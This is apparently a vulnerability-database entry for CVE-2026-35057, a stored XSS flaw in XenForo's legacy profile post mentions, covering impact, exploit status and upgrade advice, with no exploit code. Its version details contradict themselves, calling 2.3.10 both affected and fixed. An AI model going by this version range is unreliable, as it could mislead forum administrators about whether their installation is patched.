Platform
php
Component
xenforo-2-xss
Fixed in
2.3.10
2.2.19
CVE-2026-35057 describes a stored Cross-Site Scripting (XSS) vulnerability discovered in XenForo. This flaw allows an attacker to inject malicious scripts through crafted mentions within legacy profile post content. The vulnerability affects versions 2.3.0 through 2.3.10 and has been resolved in version 2.3.10. Users are advised to upgrade immediately to mitigate the risk.
Successful exploitation of CVE-2026-35057 allows an attacker to execute arbitrary JavaScript code within the context of another user's browser session. This can lead to various malicious outcomes, including session hijacking, defacement of the forum, redirection to phishing sites, and theft of sensitive user data such as cookies and authentication tokens. The stored nature of the vulnerability means that once a malicious mention is injected, it will persist and affect all users who view the affected content, amplifying the potential impact. The vulnerability specifically targets legacy profile post content, suggesting older forum configurations or migration scenarios might be more susceptible.
CVE-2026-35057 was publicly disclosed on April 1, 2026. No public proof-of-concept (PoC) code has been released at the time of writing. The vulnerability is not currently listed on CISA KEV. Given the relatively straightforward nature of XSS vulnerabilities and the public disclosure, it is reasonable to expect that attackers may begin actively targeting XenForo instances running vulnerable versions.
Exploit Status
EPSS
0.03% (8% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2026-35057 is to upgrade XenForo to version 2.3.10 or later, which contains the fix. If immediate upgrading is not feasible, consider implementing strict input validation and sanitization on user-generated content, particularly within profile post mentions. While not a complete solution, a Web Application Firewall (WAF) configured to detect and block XSS payloads targeting the affected area could provide a temporary layer of protection. Review forum logs for suspicious activity related to profile post creation and modification.
Update XenForo to version 2.3.10 or 2.2.19, or later, to fix the XSS vulnerability. This will prevent attackers from injecting malicious scripts through mentions in structured text.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2026-35057 is a stored Cross-Site Scripting (XSS) vulnerability affecting XenForo versions 2.3.0 through 2.3.10, allowing attackers to inject malicious scripts via crafted mentions.
You are affected if you are running XenForo versions 2.3.0 through 2.3.10. Upgrade to version 2.3.10 or later to resolve the vulnerability.
Upgrade XenForo to version 2.3.10 or later. Consider implementing input validation and a WAF as temporary mitigations.
While no active exploitation has been confirmed, the vulnerability is publicly known and may be targeted by attackers.
Refer to the official XenForo security advisory on their website for detailed information and updates.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.